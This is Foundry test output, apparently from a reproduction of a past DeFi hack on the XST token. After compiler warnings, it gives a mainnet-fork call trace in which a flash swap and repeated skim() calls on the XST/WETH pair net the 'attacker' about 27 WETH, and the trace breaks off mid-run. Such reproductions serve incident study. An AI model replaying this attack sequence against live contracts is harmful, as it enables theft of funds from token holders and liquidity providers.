Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-08/XST_exp2.sol:14:5:
   |
14 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-08/XST_exp2.sol:34:28:
   |
34 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                            ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-08/XST_exp2.sol:34:44:
   |
34 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                            ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-08/XST_exp2.sol:34:61:
   |
34 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                                             ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-08/XST_exp2.sol:34:78:
   |
34 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                                                              ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 600.38ms (3.00ms CPU time)

Ran 1 test for src/test/2022-08/XST_exp2.sol:ContractTest
[PASS] testExploit() (gas: 995536)
Logs:
  Attacker WETH profit before exploit: 0.000000000000000000
  Attacker WETH profit after exploit: 27.130181656842120567

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 15310016 [1.531e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [1068636] ContractTest::testExploit()
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Attacker WETH profit before exploit", val: 0, decimals: 18)
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   └─ ← [Return] 38996558907351703870 [3.899e19]
    ├─ [1019401] 0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852::swap(77993117814703407740 [7.799e19], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [27962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 77993117814703407740 [7.799e19])
    │   │   ├─ emit Transfer(from: 0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 77993117814703407740 [7.799e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0xaced72359d8708e95d2112ba70e71fa267967a5588d15e7c78c1904e0debe410: 0x00000000000000000000000000000000000000000000021db25c9f76036abd59 → 0x00000000000000000000000000000000000000000000021977fd6808a4d47add
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000043a5f376d5e96427c
    │   │   └─ ← [Return] true
    │   ├─ [949508] ContractTest::uniswapV2Call(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 77993117814703407740 [7.799e19], 0, 0x00)
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 77993117814703407740 [7.799e19]
    │   │   ├─ [2504] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 605494314011911 [6.054e14], 38996558907351703870 [3.899e19], 1659872212 [1.659e9]
    │   │   ├─ [6062] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 77993117814703407740 [7.799e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 77993117814703407740 [7.799e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000043a5f376d5e96427c → 0
    │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6940: 0x0000000000000000000000000000000000000000000000021d2f9bb6af4b213e → 0x000000000000000000000000000000000000000000000006578ed3240de163ba
    │   │   │   └─ ← [Return] true
    │   │   ├─ [157676] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::swap(403258404188293 [4.032e14], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [120597] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 403258404188293 [4.032e14])
    │   │   │   │   ├─ [113318] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 403258404188293 [4.032e14]) [delegatecall]
    │   │   │   │   │   ├─ [2388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 605494314011911 [6.054e14]
    │   │   │   │   │   │   └─ ← [Return] 605494314011911 [6.054e14]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 403258404188293 [4.032e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 80047801377386 [8.004e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 80047801377386 [8.004e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 6: 0x0000000000000000000000000000000000000000000000000000000062efa3d4 → 0x0000000000000000000000000000000000000000000000000000000062f2bdbd
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x000000000000000000000000000000000000000000000000000226a8cbe42726 → 0x000000000000000000000000000000000000000000000000000226b1a1800d07
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x1afa17d6f52cbc1fd2cf0e5cf2cbccb38054d8b6b2677090880a3bddbe9654bb
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6945: 0x0000000000000000000000000000000000000000000000021ea9c13abb6742fc → 0x0000000000000000000000000000000000000000000000021d3843bf13742aa1
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x0897bef2c12afb307f39ff0362d586f96e604d99602f97aecf3b6adfdb0a7f1e → 0x0df29f6576435630b0f3adaf4971bc1ce36a2228f55d1cada588caa75bfd3f34
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6944: 0x00000000000000000000000000000000000000000000000000022530bc90f218 → 0x000000000000000000000000000000000000000000000000000226a8cbe42726
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6942: 0x0000000000000000000000000000000000000000000000021d3843bf13742aa1 → 0x000000000000000000000000000000000000000000000006578ed3240de163ba
    │   │   │   │   │   │   @ 0x1a670d8dd5e8e6b20e2134ca2c3f077cc605eda824aae5201b15d148921a9532: 0x288187add54c806c4817f20f6d98ffedeaa45eb5b7bab0227983cd6446d59a80 → 0x0d876fd6e01fc44c7548e3b27acd333a6a4f85ff05533f91f1799186883f45c5
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x0897bef2c12afb307f39ff0362d586f96e604d99602f97aecf3b6adfdb0a7f1e → 0x0df29f6576435630b0f3adaf4971bc1ce36a2228f55d1cada588caa75bfd3f34
    │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000000d351b4c8f9801 → 0x0000000000000000000000000000000000000000000000000018953a8b34f8aa
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 376420197828040 [3.764e14]
    │   │   │   │   └─ ← [Return] 376420197828040 [3.764e14]
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ emit Sync(reserve0: 376420197828040 [3.764e14], reserve1: 116989676722055111610 [1.169e20])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 174184288004422 [1.741e14], amount1In: 77993117814703407740 [7.799e19], amount0Out: 403258404188293 [4.032e14], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x62efa3d40000000000021d2f9bb6af4b213e000000000000000226b1a1800d07 → 0x62f2bdbd000000000006578ed3240de163ba0000000000000001565a282d85c8
    │   │   │   │   @ 10: 0x000000000000000000000000000000000231dc0a3ad8593fe7e13097099e7749 → 0x00000000000000000000000000000000023503e5e5c733f780dfbc5d27b82676
    │   │   │   │   @ 9: 0x000000000000000000000000071f0dd17db4e98312622c59114596684a426866 → 0x00000000000000000000000007221a0578d6712bf6245eede33272feeb495919
    │   │   │   └─ ← [Stop]
    │   │   ├─ [4725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [3949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 750581874469107 [7.505e14]
    │   │   │   └─ ← [Return] 750581874469107 [7.505e14]
    │   │   ├─ [39113] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 93822734308638 [9.382e13])
    │   │   │   ├─ [38334] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 93822734308638 [9.382e13]) [delegatecall]
    │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 376420197828040 [3.764e14]
    │   │   │   │   │   └─ ← [Return] 376420197828040 [3.764e14]
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 92415393294009 [9.241e13])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 938227343086 [9.382e11])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xDC958664Bc528A55723740b2F32F11CA8B601c83, value: 469113671543 [4.691e11])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000018953a8b34f8aa → 0x00000000000000000000000000000000000000000000000000189460187fd9bc
    │   │   │   │   │   @ 0x1a670d8dd5e8e6b20e2134ca2c3f077cc605eda824aae5201b15d148921a9532: 0x0d876fd6e01fc44c7548e3b27acd333a6a4f85ff05533f91f1799186883f45c5 → 0x10d9bfe505abd71fffd59240cb7479f454ad945494591d71e7be23ab17046325
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x1afa17d6f52cbc1fd2cf0e5cf2cbccb38054d8b6b2677090880a3bddbe9654bb → 0x179ad4dc1687290490fb6daa9e1b742de4a119acad841545867048ba6bfa197b
    │   │   │   │   │   @ 11: 0xf8b204fcf9a594f7e3acb342c98e01cdc78cb348eafec46ed3683537e65eec9d → 0xf8a96309d39494c8142811d57187f5f0a6a8e825f1c070d2212f49e363cf835d
    │   │   │   │   │   @ 0x72df8701a157df1504c992cc381b2a2a15b3a6a12925db3f882ce3b1ee1fde0a: 0x00bd1862d26eca4722251cacc9eadd4a4b56e1e4c88d1b83a35e57442e8774f8 → 0x00c1695c65774a5f09e76d6375ede338dbc8c776452c4551fc7accee6fcf2998
    │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x000000000000000000000000000000000000000000000000000226b1a1800d07 → 0x0000000000000000000000000000000000000000000000000001565a282d85c8
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 468835591122049 [4.688e14]
    │   │   │   │   └─ ← [Return] 468835591122049 [4.688e14]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 92415393294009 [9.241e13])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 92415393294009 [9.241e13]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 468835591122049 [4.688e14]
    │   │   │   │   │   │   └─ ← [Return] 468835591122049 [4.688e14]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 92415393294009 [9.241e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 32292017763275 [3.229e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 32292017763275 [3.229e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x0df29f6576435630b0f3adaf4971bc1ce36a2228f55d1cada588caa75bfd3f34 → 0x0f1bbdb4980bb738bd066604b4d35f2d11fccbed6f64bd15c34e0fabe4e37354
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x0df29f6576435630b0f3adaf4971bc1ce36a2228f55d1cada588caa75bfd3f34 → 0x0f1bbdb4980bb738bd066604b4d35f2d11fccbed6f64bd15c34e0fabe4e37354
    │   │   │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000000189460187fd9bc → 0x000000000000000000000000000000000000000000000000001d2b26f269f196
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x0000000000000000000000000000000000000000000000000001565a282d85c8 → 0x0000000000000000000000000000000000000000000000000001aa674addec81
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 556366471785238 [5.563e14]
    │   │   │   │   └─ ← [Return] 556366471785238 [5.563e14]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 179946273957198 [1.799e14])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 179946273957198 [1.799e14]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 556366471785238 [5.563e14]
    │   │   │   │   │   │   └─ ← [Return] 556366471785238 [5.563e14]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 179946273957198 [1.799e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 43311268678757 [4.331e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 43311268678757 [4.331e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x0f1bbdb4980bb738bd066604b4d35f2d11fccbed6f64bd15c34e0fabe4e37354 → 0x106b8d50a965c2aa88685b11b02d7360bc7fa64e11a5ff7e64809d7d8b3dca4b
    │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000001d2b26f269f196 → 0x000000000000000000000000000000000000000000000000002352ce91c9e185
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x0f1bbdb4980bb738bd066604b4d35f2d11fccbed6f64bd15c34e0fabe4e37354 → 0x106b8d50a965c2aa88685b11b02d7360bc7fa64e11a5ff7e64809d7d8b3dca4b
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x0000000000000000000000000000000000000000000000000001aa674addec81 → 0x0000000000000000000000000000000000000000000000000001fa0329ea6b16
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 673766180836653 [6.737e14]
    │   │   │   │   └─ ← [Return] 673766180836653 [6.737e14]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 297345983008613 [2.973e14])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 297345983008613 [2.973e14]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 673766180836653 [6.737e14]
    │   │   │   │   │   │   └─ ← [Return] 673766180836653 [6.737e14]
